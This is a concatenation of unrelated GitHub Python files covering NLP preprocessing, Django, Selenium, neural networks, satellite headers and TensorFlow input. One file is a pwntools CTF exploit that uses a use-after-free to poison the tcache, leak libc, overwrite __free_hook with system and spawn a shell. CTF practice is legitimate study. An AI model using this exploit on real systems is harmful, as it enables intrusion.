from classes.CustomCorpusReader import HTMLCorpusReader
import os
import pickle
class Preprocessor(object):
"""Обёртка над HTMLCorpusReader"""
def __init__(self, corpus, target, **kwargs):
self.corpus = corpus
self.target = target
def fileids(self, fileids=None, categories=None):
fileids = self.corpus.resolve(fileids, categories)
if fileids:
return fileids
return self.corpus.fileids()
def abspath(self, fileid):
# Ищем путь к каталогу относительно корня исходного корпуса
parent = os.path.relpath(os.path.dirname(self.corpus.abspath(fileid)), self.corpus.root)
# Выделяем части пути для реконструирования
basename = os.path.basename(fileid)
name, ext = os.path.splitext(basename)
# Создаем имя файла с расширением .pickle
basename = name + '.pickle'
# Возвращаем путь к файлу относительно корня целевого корпуса
return os.path.normpath(os.path.join(self.target, parent, basename))
def tokenize(self, fileid):
for paragraph in self.corpus.paras(fileids=fileid):
yield[
pos_tag(wordpunct_tokenize(sent), lang='rus')
for sent in sent_tokenize(paragraph)
]
def process(self, fileid):
"""
Записывает трансформированный документ в виде сжатого архива в заданное место.
Вызывается для одного файла, проверяет местоположение на диске, чтобы избежать ошибок.
Использует tokenize() для предварительной обработки. Полученные данные и записываются в файл.
"""
# Определяем путь к файлу для записи результата
target = self.abspath(fileid)
parent = os.path.dirname(target)
# Убеждаемся, что каталог существует
if not os.path.exists(parent):
os.makedirs(parent)
# Убеждаемся, что parent - папку, а не файл
if not os.path.isdir(parent):
raise ValueError("Нужно предоставить папку для записи обработанных данных!")
# Создаем структуру данных для записи в архив
document = list(self.tokenize(fileid))
# Пишем данные в архив на диск
with open(target, 'wb') as f:
pickle.dump(document, f, pickle.HIGHEST_PROTOCOL)
# Удаляем документ из памяти
del document
# Возвращаем путь к целевому файлу
return target
def transform(self, fileids=None, categories=None):
"""Метод, вызывающий process()"""
# Создаем целевой каталог, если он еще не создан
if not os.path.exists(self.target):
os.makedirs(self.target)
# Получить имена файлов для обработки
for fileid in self.fileids(fileids, categories):
yield self.process(fileid)
|
[
"avpmanager@gmail.com"
] |
avpmanager@gmail.com
|
145a60e8244e8c62053d46b2ed498514d3f30768
|
e5554dae331c863d3240c66ca0189cc784935f3e
|
/manage.py
|
3836d39c220a029eedcb437492acf5dca11d2aaa
|
[] |
no_license
|
momikenSneg/ecg_editor
|
3299fed4d173b92e52fb67577d3ed44606d907d3
|
7a9a9635ea8fb62af0fc5c31560b71eb47de6150
|
refs/heads/master
| 2023-04-06T00:09:33.824429
| 2021-04-06T10:06:00
| 2021-04-06T10:06:00
| 337,184,921
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
#!/usr/bin/env python
"""Django's command-line utility for administrative tasks."""
import os
import sys
def main():
"""Run administrative tasks."""
os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'web_editor.settings')
try:
from django.core.management import execute_from_command_line
except ImportError as exc:
raise ImportError(
"Couldn't import Django. Are you sure it's installed and "
"available on your PYTHONPATH environment variable? Did you "
"forget to activate a virtual environment?"
) from exc
execute_from_command_line(sys.argv)
if __name__ == '__main__':
main()
|
[
"e.snegireva@g.nsu.ru"
] |
e.snegireva@g.nsu.ru
|
c17ed168a9f913b2c1082c60adc0dd0b986ba84f
|
9758fa6d66df1121ff9e0b4a7da511653bc53cf1
|
/Food/migrations/0018_auto_20190825_1336.py
|
dc7b6dc448dd9060168379f3107d594f2f6dc47d
|
[] |
no_license
|
hdforoozan/Restaurant-project
|
179fb4138cb92bfd7716671c3b1e8b1949bfbaff
|
2ab096cbc3ee20557b57ed97bd0d5556c5965e87
|
refs/heads/master
| 2020-06-12T08:50:03.067740
| 2019-09-17T18:48:43
| 2019-09-17T18:48:43
| 194,250,030
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 398
|
py
|
# Generated by Django 2.2.2 on 2019-08-25 09:06
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('Food', '0017_food_users_like'),
]
operations = [
migrations.AlterField(
model_name='food',
name='price',
field=models.DecimalField(decimal_places=2, max_digits=10),
),
]
|
[
"hdforoozan@gmail.com"
] |
hdforoozan@gmail.com
|
f9bf02e34f365e5136aaecfd9d27ccd68fbe9d0f
|
16557aae9ebe153c4719408e9ddce70f7c36a345
|
/DEKRACTF_2020/heapMePls/exploit.py
|
9a295c4ed19dfa7dcecc3287f017ca796b6ce7e0
|
[] |
no_license
|
FDlucifer/exploit-challenges-1
|
216b7cae40f163146b7b72f51a35a6eb2396d8d3
|
2fa1714410dd442ae684771408db985a8f13c85e
|
refs/heads/main
| 2023-03-14T08:33:45.604121
| 2021-03-07T18:09:14
| 2021-03-07T18:09:14
| 423,387,052
| 1
| 0
| null | 2021-11-01T08:15:35
| 2021-11-01T08:15:35
| null |
UTF-8
|
Python
| false
| false
| 2,404
|
py
|
from pwn import *
# --- Info ---
# CTF: DEKRA
# Date: -
# Challenge: HeapMePls
# Description: Simple tcache poisoning attack via Use-After-Free
# --- End Info ---
#context.log_level = 'debug'
context.terminal = ["tmux", "sp", "-h"]
context.endian = 'little'
PATH = './vuln'
LIBC = './libc-2.28.so'
ENV = {"LD_PRELOAD":"./libc-2.28.so"}
libc = ELF(LIBC, checksec = False)
binary = ELF(PATH, checksec = False)
REMOTE = 0
HOST = '168.119.247.237'
PORT = 5012
def add(n, name):
r.recvuntil('>')
r.sendline('1')
r.recvuntil('items: ')
r.sendline(str(int(n)))
r.recvuntil('Name: ')
r.sendline(name)
def edit(idx, n, name):
r.recvuntil('>')
r.sendline('4')
r.recvuntil('index: ')
r.sendline(str(int(idx)))
r.recvuntil('items: ')
r.sendline(str(int(n)))
r.recvuntil('Name: ')
r.sendline(name)
def show(idx):
r.recvuntil('>')
r.sendline('3')
r.recvuntil('index: ')
r.sendline(str(int(idx)))
def free(idx):
r.recvuntil('>')
r.sendline('2')
r.recvuntil('index: ')
r.sendline(str(int(idx)))
def pad(addr):
return addr + b'\x00'*(8-len(addr))
context.binary = PATH
if REMOTE:
r = remote(HOST, PORT)
else:
r = process(PATH, env=ENV)
#gdb.attach(r)
#pause()
add(1024, "AAAA") # 0
add(1024, "/bin/sh\x00") # 1
for _ in range(7):
add(1024, "AAAA")
for i in range(7):
free(i)
free(0) # 0
show(0)
leak = u64(pad(r.recvuntil('\n')[:-1]))
libc_base = leak - 0x3b0ca0
binsh = libc_base + 0x177b75
system = libc_base + libc.symbols['system'] #0x0000000000041b80
__free_hook = libc_base + libc.symbols['__free_hook']
__malloc_hook = libc_base + libc.symbols['__malloc_hook']
log.info('Leaked: libc base @ ' + hex(libc_base))
log.info('Leaked: system @ ' + hex(system))
log.info('Leaked: /bin/sh @ ' + hex(binsh))
log.info('Leaked: __free_hook @ ' + hex(__free_hook))
log.info('Leaked: __malloc_hook @ ' + hex(__malloc_hook))
add(0x80, "AAAA") # 9
add(0x80, "AAAA") # 10
free(9)
free(10)
'''
0x41a06 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL
0x41a5a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL
0xdfe81 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL
'''
edit(10, 0x80, p64(__free_hook))
add(0x80, "AAAA")
add(0x80, p64(system))
add(0x10, "/bin/bash\x00") # 13
pause()
free(13)
r.interactive()
r.close()
|
[
"noreply@github.com"
] |
FDlucifer.noreply@github.com
|
e5e187191960e5bd2599ed13047b11725d49c3ba
|
4a7a12ae309a4828ebe1f7ea813711314d881962
|
/selenium基本操作.py
|
962fdc1e3b2649c075fb1ccc29380cf10e2d7f7a
|
[] |
no_license
|
snakecook/selenium
|
44137252e2ef42684e71917f5dc6f162e7a596a0
|
5d9a92bfc98aa2aa0ddfad2455da8d3c374ec26e
|
refs/heads/master
| 2022-12-13T15:50:54.631963
| 2020-09-01T14:53:55
| 2020-09-01T14:53:55
| 292,028,815
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,440
|
py
|
'''
- 下载安装selenium: pip install selenium
- 下载浏览器驱动程序
- http://chromedriver.storage.googleapis.com/index.html
- 查看驱动和浏览器版本的映射关系:
- http://blog.csdn.net/huilan_same/article/details/51896672
- 实例化某一浏览器对象
- 动作链:
- 一系列连续的动作
- 在实现标签定位时,如果发现定位的标签是存在于iframe标签之中的
,则在定位时必须执行一个固定的操作:bro.switch_to.frame('iframe的id')
- 无头浏览器的操作:无可视化界面的浏览器
- PhantomJs:停止更新
- 谷歌无头浏览器
- 让selenium规避检测
'''
from time import sleep
from selenium import webdriver
bro = webdriver.Chrome(executable_path=r'F:\cc\chaojiying\chaojiying_Python\chromedriver.exe')
# 目标网页
bro.get('https://www.jd.com/')
# 进行标签定位
search_input = bro.find_element_by_xpath('//*[@id="key"]')
search_input.send_keys('我叼你妈的!')
btn = bro.find_element_by_xpath('//*[@id="search"]/div/div[2]/button')
btn.click()
sleep(2)
# 执行js
# bro.execute_script('window.scrollTo(0,document.body.scrollHeight)') # 滚动到底
bro.execute_script('window.scrollTo(0,400)')
sleep(0.5)
bro.execute_script('window.scrollTo(0,800)')
sleep(0.5)
bro.execute_script('window.scrollTo(0,1200)')
sleep(2)
# 获取页面代码
page_text = bro.page_source
print(page_text)
sleep(1)
bro.quit()
|
[
"112@qq.com"
] |
112@qq.com
|
0502814ae0a54fbd92c65e786d412a00fd32ba5e
|
bc527cc92afcf5eefe88f87ccfaf1c85d8e3abdf
|
/NN.py
|
e5ca75f0ad723d576a037b59f951480dc522bb6d
|
[] |
no_license
|
ehillis2/datamining
|
55648ff4bf2c65555e825cce7fea848d936ddcb0
|
68c0ab4a0c8344eaeb2d4e937ad2c612d88d7094
|
refs/heads/main
| 2023-02-06T05:08:32.226553
| 2020-12-24T17:33:25
| 2020-12-24T17:33:25
| 303,435,146
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,479
|
py
|
import processing
from sklearn.neural_network import MLPClassifier
from sklearn.model_selection import StratifiedKFold
from sklearn.decomposition import PCA
from sklearn import metrics
import numpy as np
import random
import pandas as pd
import matplotlib.pyplot as plt
import itertools as it
import operator
import sys
import math
import csv
import time
def NNmodelScore(model, trainingdata, traininglabels, testingdata, testinglabels):
model.fit(trainingdata, traininglabels.values.ravel())
return model.score(testingdata, testinglabels)
def NeuralNetwork(data_features, data_labels, nnmodel):
folds = StratifiedKFold(n_splits=10)
scores = []
for train_index, test_index in folds.split(data_features, data_labels):
X_train, X_test, y_train, y_test = data_features.iloc[train_index], data_features.iloc[test_index], \
data_labels.iloc[train_index], data_labels.iloc[test_index]
scores.append(100 * NNmodelScore(nnmodel,
X_train, y_train, X_test, y_test))
#print('these are the scores: ', scores)
#print('mean:', np.mean(scores))
return np.mean(scores)
NN_STD_means = []
NN_PCA_means = []
def mainNeuralNetworkImplementation(nnmodel, linPCA, training_dataframe, pca_option):
df = pd.read_csv("BreastCancerData.csv")
column_titles = None
column_titles = processing.processData(df, column_titles)
column_titles = np.array(column_titles)
training_data = []
final_validation = []
processing.splitData(training_dataframe, .8,
training_data, final_validation)
training_data = np.array(training_data)
final_validation = np.array(final_validation)
features = []
labels = []
features, labels = processing.createFeatures_Labels(training_data)
np.transpose(labels)
features_data = None
labels_data = None
features_data, labels_data = processing.convertToDataFrame(
features, labels, column_titles)
if(pca_option == 'both'):
#print('Random Forest model without PCA')
NN_STD_means.append(NeuralNetwork(
features_data, labels_data, nnmodel))
# print()
features_data_PCA = processing.linearPCAReduction(
features_data, linPCA)
features_df_PCA = pd.DataFrame(
features_data_PCA, columns=column_titles[1:(features_data_PCA.shape[1] + 1)])
#print('Random Forest model with PCA')
NN_PCA_means.append(NeuralNetwork(
features_df_PCA, labels_data, nnmodel))
elif(pca_option == 'yes'):
features_data_PCA = processing.linearPCAReduction(
features_data, linPCA)
features_df_PCA = pd.DataFrame(
features_data_PCA, columns=column_titles[1:(features_data_PCA.shape[1] + 1)])
#print('Random Forest model with PCA')
NN_PCA_means.append(NeuralNetwork(
features_df_PCA, labels_data, nnmodel))
else:
NN_STD_means.append(NeuralNetwork(
features_data, labels_data, nnmodel))
# print()
def NeuralNetworkSimulation(nnmodel, linPCA, training_dataframe, pca_option):
print()
if(pca_option == 'both'):
start = time.time()
number = 1
print('Simulating neural network model...')
for i in range(0, number):
#print('neural network simulation number', i, 'finished')
mainNeuralNetworkImplementation(
nnmodel, linPCA, training_dataframe, pca_option)
end = time.time()
print('Neural Network Simulation time:', end - start)
m = None
if np.mean(NN_STD_means) > np.mean(NN_PCA_means):
m = 'STANDARD MODEL'
else:
m = 'PCA TRANSFORMED MODEL'
count = 0
for i in range(0, number):
if(NN_PCA_means[i] > NN_STD_means[i]):
count = count + 1
print()
print('number of times neural network pca transformed model had greater accuracy than random forest standard model: ',
count, 'out of ', number)
print('neural network variance in accuracy for standard model: ',
np.var(NN_STD_means))
print('neural network variance in accuracy for pca transform model: ',
np.var(NN_PCA_means))
print('neural network standard model accuracy: ', np.mean(NN_STD_means))
print('neural network pca transformed model accuracy: ',
np.mean(NN_PCA_means))
print('maximum neural network accuracy on 10fold cross-val test data attained by', m, "with an accuracy of: ", max(
np.mean(NN_PCA_means), np.mean(NN_STD_means)), '%')
print()
elif(pca_option == 'yes'):
start = time.time()
number = 1
print('Simulating pca transformed neural network model...')
for i in range(0, number):
mainNeuralNetworkImplementation(
nnmodel, linPCA, training_dataframe, pca_option)
end = time.time()
print('Neural Network Simulation time:', end - start)
print()
print('pca transform neural network model variance in accuracy: ',
np.var(NN_PCA_means))
print('pca transformed neural network model accuracy on 10fold cross-val test data: ',
np.mean(NN_PCA_means))
print()
else:
number = 1
start = time.time()
print('Simulating standard neural network model...')
for i in range(0, number):
#print('neural network simulation number', i, 'finished')
mainNeuralNetworkImplementation(
nnmodel, linPCA, training_dataframe, pca_option)
end = time.time()
print('Neural Network Simulation time:', end - start)
print()
print('standard neural network model variance in accuracy: ',
np.var(NN_STD_means))
print('standard neural network model accuracy on 10fold cross-val test data: ',
np.mean(NN_STD_means))
print()
nn = MLPClassifier(random_state=1, solver='lbfgs')
nn_sgd = MLPClassifier(random_state=1, solver='sgd')
"""
start = time.time()
mainNeuralNetworkImplementation(
nn, processing.linear_pca, processing.overall_training_data)
end = time.time()
print('Time of mainNeuralNetworkImplementation', end - start)
#NeuralNetworkSimulation(nn, processing.linear_pca,
# processing.overall_training_data)
"""
|
[
"noreply@github.com"
] |
ehillis2.noreply@github.com
|
2c42d501c2cf98bb835561f7ce5a97d59d48ecb3
|
a05da5da30f1e2b72ed1686d847544215ce2e1f1
|
/xrit-header.py
|
b714c563ba88eb4a25889b5857ddd444a1a344c3
|
[] |
no_license
|
cdzkhxhdgs/COMS-1
|
fb45184e40b393e274da8ba00ad0544280b3f1f5
|
fbcf2113bfe84d00cd43d95119d2ff50169dc9a3
|
refs/heads/master
| 2020-04-13T07:40:58.257874
| 2018-10-03T09:46:16
| 2018-10-03T09:46:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,036
|
py
|
"""
lrit-header.py
https://github.com/sam210723/coms-1
Parses xRIT file and displays header information in a human-readable format.
"""
import argparse
from coms import COMS as comsClass
argparser = argparse.ArgumentParser(description="Parses xRIT file and displays header information in a human-readable format.")
argparser.add_argument("PATH", action="store", help="Input xRIT file")
args = argparser.parse_args()
# Create COMS class instance and load xRIT file
COMS = comsClass(args.PATH)
# Primary Header (type 0, required)
COMS.parsePrimaryHeader(True)
# START OPTIONAL HEADERS
COMS.parseImageStructureHeader(True)
COMS.parseImageNavigationHeader(True)
COMS.parseImageDataFunctionHeader(True)
COMS.parseAnnotationTextHeader(True)
COMS.parseTimestampHeader(True)
COMS.parseAncillaryTextHeader(True)
COMS.parseKeyHeader(True)
COMS.parseImageSegmentationInformationHeader(True)
COMS.parseImageCompensationInformationHeader(True)
COMS.parseImageObservationTimeHeader(True)
COMS.parseImageQualityInformationHeader(True)
|
[
"sam210723@hotmail.com"
] |
sam210723@hotmail.com
|
0279b8479bb0638490b8d8cc6a83aab30c0a06f1
|
605d63d23bc2e07eb054979a14557d469787877e
|
/atest/testresources/testlibs/pythonmodule/submodule/__init__.py
|
ce29c8eedcad746723f5da941daf6c4288ee44fe
|
[
"Apache-2.0",
"CC-BY-3.0"
] |
permissive
|
robotframework/robotframework
|
407b0cdbe0d3bb088f9bfcf9ea7d16e22eee1ddf
|
cf896995f822f571c33dc5651d51365778b1cf40
|
refs/heads/master
| 2023-08-29T03:19:00.734810
| 2023-08-27T18:14:48
| 2023-08-28T18:14:11
| 21,273,155
| 8,635
| 2,623
|
Apache-2.0
| 2023-09-05T04:58:08
| 2014-06-27T11:10:38
|
Python
|
UTF-8
|
Python
| false
| false
| 15
|
py
|
attribute = 42
|
[
"peke@iki.fi"
] |
peke@iki.fi
|
b494d146fd39b85413b9ab89babb6933f9662bf8
|
6fa7f99d3d3d9b177ef01ebf9a9da4982813b7d4
|
/RejGBWcKsKM2PANip_6.py
|
57e62895a1c80b85fd33ca4de87e610fdce8abd7
|
[] |
no_license
|
daniel-reich/ubiquitous-fiesta
|
26e80f0082f8589e51d359ce7953117a3da7d38c
|
9af2700dbe59284f5697e612491499841a6c126f
|
refs/heads/master
| 2023-04-05T06:40:37.328213
| 2021-04-06T20:17:44
| 2021-04-06T20:17:44
| 355,318,759
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 43
|
py
|
number_syllables=lambda w:w.count('-')+1
|
[
"daniel.reich@danielreichs-MacBook-Pro.local"
] |
daniel.reich@danielreichs-MacBook-Pro.local
|
66038a6a9f3d13ab170760381bc61b357fad59f0
|
8a1ca658c1ace3ac6aff98d4547b20c5442fea98
|
/wrn.py
|
21c975f969a1022d8a986d4f2fee3e9bd86ecf42
|
[
"BSD-2-Clause"
] |
permissive
|
GRSEB9S/wrn
|
00986a6caccd48c4a57dc0fa51f23a83ff6828ce
|
5c8873b9dcaa73c9f5aaa4f5767e5e95a32f7df2
|
refs/heads/master
| 2021-06-23T14:16:41.589262
| 2017-08-31T11:53:36
| 2017-08-31T11:53:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,677
|
py
|
from keras import layers, models, regularizers
def building_block(inputs, double_filters, weight_decay, dropout):
"""Create basic building block for WRN."""
try:
layer_id = building_block.id
except AttributeError:
building_block.id = 1
layer_id = 1
x = layers.BatchNormalization(name='l' + str(layer_id) + '_bn1')(inputs)
x = layers.Activation('relu')(x)
x = layers.Dropout(dropout)(x)
if double_filters:
n_filters = int(inputs.shape[-1]) * 2
add = layers.Conv2D(n_filters, (2, 2), kernel_regularizer=regularizers.l2(weight_decay), strides=(2, 2), trainable=False, name='l' + str(layer_id) + '_Ws')(inputs)
stride = 2
x = layers.Conv2D(n_filters, (3, 3), kernel_regularizer=regularizers.l2(weight_decay), strides=(stride, stride), padding='same', name='l' + str(layer_id) + '_conv1_3x3x' + str(n_filters) + '_stride_' + str(stride))(x)
else:
n_filters = int(inputs.shape[-1])
add = inputs
x = layers.Conv2D(n_filters, (3, 3), kernel_regularizer=regularizers.l2(weight_decay), padding='same', name='l' + str(layer_id) + '_conv1_3x3x' + str(n_filters))(x)
x = layers.BatchNormalization(name='l' + str(layer_id) + '_bn2')(x)
x = layers.Activation('relu')(x)
x = layers.Dropout(dropout)(x)
x = layers.Conv2D(n_filters, (3, 3), kernel_regularizer=regularizers.l2(weight_decay), padding='same', name='l' + str(layer_id) + '_conv2_3x3x' + str(n_filters))(x)
building_block.id += 1
return layers.Add(name='l' + str(layer_id) + '_add')([x, add])
def build_wrn(inputs, n_classes, first_layer_kernel=(3, 3), first_layer_strides=(1, 1), groups=3, blocks_in_groups=1, filters_mult=1, dropout=0., weight_decay=0., include_batch_norm=True):
"""Create WRN."""
n_filters_1st_layer = 16 * filters_mult
t = layers.BatchNormalization(name='bn0')(inputs)
t = layers.Conv2D(n_filters_1st_layer, first_layer_kernel, kernel_regularizer=regularizers.l2(weight_decay), strides=first_layer_strides, padding='same', activation='relu', name='conv0_7x7x' + str(n_filters_1st_layer) + '_stride2')(t)
for i in range(groups):
t = building_block(t, i > 0, weight_decay, dropout)
for _ in range(blocks_in_groups - 1):
t = building_block(t, False, weight_decay, dropout)
t = layers.BatchNormalization(name='last_bn')(t)
t = layers.Activation('relu')(t)
t = layers.pooling.GlobalAveragePooling2D(name='global_avg_pool')(t)
t = layers.Dense(n_classes, kernel_regularizer=regularizers.l2(weight_decay), name='output')(t)
t = layers.Activation('softmax')(t)
return models.Model(inputs=inputs, outputs=t)
|
[
"noreply@github.com"
] |
GRSEB9S.noreply@github.com
|
7c036450975191a96468b11af985b239af0ca668
|
545287103b8af5d70a008dcc6944b23ba2085e4a
|
/maze_generator/blender/interaction/messagebox_manager.py
|
bb42b72fd90b49caeac63d2924ac9f86d942d800
|
[] |
no_license
|
Gorgious56/MazeGenerator
|
ac83040ebb78029065fbfc46a23f6ee9f950ce89
|
c7786a1d0bade95469ba87c9537d1da64801dc66
|
refs/heads/master
| 2022-11-23T21:21:08.254284
| 2022-11-06T10:58:28
| 2022-11-06T10:58:28
| 250,792,747
| 67
| 9
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 217
|
py
|
import bpy
def ShowMessageBox(message="", title="Message Box", icon='INFO'):
def draw(self, context):
self.layout.label(message)
bpy.context.window_manager.popup_menu(draw, title=title, icon=icon)
|
[
"nathan.hild@gmail.com"
] |
nathan.hild@gmail.com
|
40bcf300e0d4931eb0336d1a4a8224e3aec77be7
|
8adca41b59f269c62b2b469789e164ad240a5dd7
|
/ui/demo3 (2).py
|
6773f4167c84166af642430e26eaa4fe568a24b8
|
[] |
no_license
|
zhongxiu-xiu/python_study
|
16794a0ebdcc815bafb1c49928b2dbbb1306b52c
|
19fcdebc197f5d06e493a4dfc682e51a47b30191
|
refs/heads/master
| 2023-02-06T05:50:28.693653
| 2020-12-26T02:00:41
| 2020-12-26T02:00:41
| 322,170,575
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 701
|
py
|
# -*-coding:UTF-8 -*-
from selenium import webdriver
from selenium.webdriver.common.action_chains import ActionChains
from selenium.webdriver.common.keys import Keys
driver = webdriver.Chrome()
driver.get('http://192.168.1.4/ecshop/admin/privilege.php?act=login')
driver.maximize_window()
driver.find_element_by_name('username').send_keys('caichang')
driver.find_element_by_name('password').send_keys('caichang1')
driver.find_element_by_class_name('btn-a').send_keys(Keys.ENTER)
driver.switch_to.frame('header-frame')
ActionChains(driver).move_to_element(driver.find_element_by_link_text('个人设置')).perform()
driver.find_element_by_link_text('退出').click()
|
[
"1053966454@qq.com"
] |
1053966454@qq.com
|
5b8d58249172a7b5266d50944fceb096f4ba4a1b
|
878625467c09742cbcc660791e5b2b38a407b4fe
|
/regular expression/mob.py
|
fded198953b8888ba27214e9779759599f3e4242
|
[] |
no_license
|
PraisyPrasad/luminarpythonprograms
|
b7c80a08fe380826513d5339c8899927405e40dd
|
83dfcb143d7fc9de53d4882f695a467fe238772e
|
refs/heads/master
| 2023-04-25T09:02:33.028285
| 2021-05-15T00:23:45
| 2021-05-15T00:23:45
| 367,158,687
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 152
|
py
|
import re
n=input("enter num is valid")
x='[+][9][1]\d{10}'
match=re.fullmatch(x,n)
if match is not None:
print("valid")
else:
print("invalid")
|
[
"praisyprasad123@gmail.com"
] |
praisyprasad123@gmail.com
|
10d3ddc612d1426bc04e35bc349569fe384e0a69
|
174ad2b84041ee9dface6f822737cd30e39aa04d
|
/PythonHomeWork(Essential)/PythonHomeWork_7/HomeWork7/AddTask/Task2(newVersion)/cli_main.py
|
a814ef3fda06880248a9c9e6bd995c6160cd7d74
|
[] |
no_license
|
duk1edev/projects
|
88f26830ac16f0fc889cace8ffab756788ee0b24
|
74bdea8b56bee9e1c0d8a78405ad0ca7bad38543
|
refs/heads/master
| 2020-06-24T17:15:17.891008
| 2019-11-29T17:23:54
| 2019-11-29T17:23:54
| 199,027,173
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,312
|
py
|
"""Модуль консольного интерфейса приложения"""
from links_db import LinksDB
def add_link_to(links):
"""Функция добавления новой ссылки в хранилище links"""
while True:
short_name = input('Enter the short name: ')
original_url = input('Enter url:')
try:
links.set_url(short_name, original_url)
except (KeyError, ValueError)as error:
print(error.args[0])
else:
break
def get_link_from(links):
"""Фугкция получения ссылки из хранилища links_db"""
name = input('Enter the link name: ')
try:
url = links.get_url(name)
except KeyError:
print('Key does not exist')
else:
print(url)
links = LinksDB()
def main():
"""Главная функция приложения"""
while True:
print('1.Add link')
print('2.Get link')
print('3.Exit')
choise = input(">")
if choise == '1':
add_link_to(links)
elif choise == '2':
get_link_from(links)
elif choise == '3':
break
else:
print('Incorrect input')
print()
if __name__ == '__main__':
main()
|
[
"duk1e.ptc.ua@yandex.ru"
] |
duk1e.ptc.ua@yandex.ru
|
3e4b00a89caba59ee5ff048d9bdc3d13ea5a3684
|
5fedc522580b56a3670762dcba6408cfe4d52a8b
|
/application/api/evaluaciones/config.py
|
cb2576d2f0aa6b373e6f1437b14776f8e0f29600
|
[] |
no_license
|
AlexisAndresHR/EncuentrAhorro_WebApp
|
953ea30ee23fd92ffe37ebb1d35c141f61818781
|
63a4d8a272d257e0d93c62557b88731e04b01937
|
refs/heads/master
| 2020-05-03T11:06:25.507755
| 2019-12-11T09:51:24
| 2019-12-11T09:51:24
| 178,593,646
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 102
|
py
|
import web
import application.models.model_evaluaciones
model = application.models.model_evaluaciones
|
[
"1717110253@utectulancingo.edu.mx"
] |
1717110253@utectulancingo.edu.mx
|
e1b6e83e07a9bcfd9001a34c8070d429dfa2709b
|
23255bee10b758d10e403b5a05fa6b16f95d9760
|
/python_visual_mpc/video_prediction/read_tf_record.py
|
4b95d75ad1c24d8ef3e9451a4146fb86abe253ba
|
[] |
no_license
|
yilundu/visual_mpc
|
454e5c1cc80a7f3c6a272a65bca8057176c280ab
|
357ba4df88dc5ab07ddb67a6cab260fc24a43a01
|
refs/heads/master
| 2022-01-12T02:00:23.606406
| 2017-09-22T22:23:41
| 2017-09-22T22:23:41
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 17,533
|
py
|
import os
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import gfile
import matplotlib.pyplot as plt
import pdb
from PIL import Image
import imp
# Dimension of the state and action.
STATE_DIM = 4
ACION_DIM = 2
OBJECT_POS_DIM = 3
from python_visual_mpc.video_prediction.utils_vpred.create_gif_lib import *
def build_tfrecord_input(conf, training=True, gtruth_pred = False, shuffle_vis = False):
"""Create input tfrecord tensors.
Args:
training: training or validation data_files.
conf: A dictionary containing the configuration for the experiment
Returns:
list of tensors corresponding to images, actions, and states. The images
tensor is 5D, batch x time x height x width x channels. The state and
action tensors are 3D, batch x time x dimension.
Raises:
RuntimeError: if no files found.
"""
filenames = gfile.Glob(os.path.join(conf['data_dir'], '*'))
if not filenames:
raise RuntimeError('No data_files files found.')
if conf['visualize']:
print 'using input file', filenames
shuffle = shuffle_vis
else:
shuffle = True
index = int(np.ceil(conf['train_val_split'] * len(filenames)))
if training:
filenames = filenames[:index]
else:
filenames = filenames[index:]
filename_queue = tf.train.string_input_producer(filenames, shuffle=shuffle)
reader = tf.TFRecordReader()
_, serialized_example = reader.read(filename_queue)
gtruthimage_seq, predimage_seq, image_seq, retina_seq, state_seq, action_seq, object_pos_seq, max_move_pos_seq, touch_seq = [], [], [], [], [], [], [], [], []
load_indx = range(0, 30, conf['skip_frame'])
load_indx = load_indx[:conf['sequence_length']]
print 'using frame sequence: ', load_indx
for i in load_indx:
if gtruth_pred:
image_pred_name = 'move/' + str(i) + '/image_pred/encoded'
image_gtruth_name = 'move/' + str(i) + '/image_gtruth/encoded'
features = {
image_pred_name: tf.FixedLenFeature([1], tf.string),
image_gtruth_name: tf.FixedLenFeature([1], tf.string),
}
else:
image_name = 'move/' + str(i) + '/image/encoded'
action_name = 'move/' + str(i) + '/action'
state_name = 'move/' + str(i) + '/state'
object_pos_name = 'move/' + str(i) + '/object_pos'
max_move_pos_name = 'move/' + str(i) + '/max_move_pose'
features = {
image_name: tf.FixedLenFeature([1], tf.string),
action_name: tf.FixedLenFeature([ACION_DIM], tf.float32),
state_name: tf.FixedLenFeature([STATE_DIM], tf.float32)
}
if 'use_object_pos' in conf.keys():
if 'num_obj' in conf:
num_obj = conf['num_obj']
else: num_obj = 1
features[object_pos_name] = tf.FixedLenFeature([OBJECT_POS_DIM*num_obj], tf.float32)
features[max_move_pos_name] = tf.FixedLenFeature([OBJECT_POS_DIM], tf.float32)
if 'retina' in conf:
retina_name = 'move/' + str(i) + '/retina/encoded'
features[retina_name] = tf.FixedLenFeature([1], tf.string)
if i == 0:
initial_retpos_name = 'initial_retpos'
features[initial_retpos_name] = tf.FixedLenFeature([2], tf.int64)
if 'touch' in conf:
touchdata_name = 'touchdata/' + str(i)
TOUCH_DIM = 20
features[touchdata_name] = tf.FixedLenFeature([TOUCH_DIM], tf.float32)
features = tf.parse_single_example(serialized_example, features=features)
if gtruth_pred:
predimage_seq.append(resize_im( features, image_pred_name, conf))
gtruthimage_seq.append(resize_im( features, image_gtruth_name, conf))
else:
image_seq.append(resize_im( features, image_name, conf))
if 'retina' in conf:
retina_seq.append(resize_im(features, retina_name, conf, height=conf['retina']))
if i == 0:
initial_retpos = tf.cast(features[initial_retpos_name], tf.int32)
state = tf.reshape(features[state_name], shape=[1, STATE_DIM])
state_seq.append(state)
action = tf.reshape(features[action_name], shape=[1, ACION_DIM])
action_seq.append(action)
if 'touch' in conf:
touchdata = tf.reshape(features[touchdata_name], shape=[1, TOUCH_DIM])
